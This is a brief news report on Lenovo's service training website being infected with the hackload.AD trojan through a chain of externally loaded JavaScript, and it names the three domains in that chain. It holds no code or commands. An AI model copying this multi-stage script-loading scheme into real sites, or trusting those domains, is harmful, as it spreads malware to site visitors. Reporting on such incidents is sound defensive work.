Lenovo's web site for service and support-related training (www.lenovoservicetraining.com) is infected and is spreading the hackload.AD trojan. Although Lenovo was informed of the issue yesterday (Monday), the vendor appears to have difficulties with solving the problem or even officially warning its users. At least the page has now been marked as dangerous in Google's Safe Browsing API, which allows browsers such as Firefox or Chrome, to block the page. The virus scanners by ESET, Kaspersky and Avast all reportedly (German language link) now detect the attack and prevent an infection from the site.

First analyses have shown that the trojan is retrieved from an external server via a link to some JavaScript code in the Lenovo page. However, it remains unclear whether the link, which leads to a marketing firm, was injected by criminals in order to act as a retrieval mechanism for the malicious code. The link could also already have existed, and the code for retrieving the malware could be finding its way onto Lenovo's web page via a hacked ad server.

The code for loading the trojan uses a multi-stage approach and tries to obscure the actual origin of the malware. The script on Lenovo's page loads a JavaScript from avidmarketing.ie, which loads a script from chemphilic.com, which, in turn, retrieves further code from dbal.co.uk. This is the second relatively recent infection for Lenovo as its driver download page had already deployed malware back in June.

See also:

Malicious code on Lenovo driver download page, a report from The H.

(crve)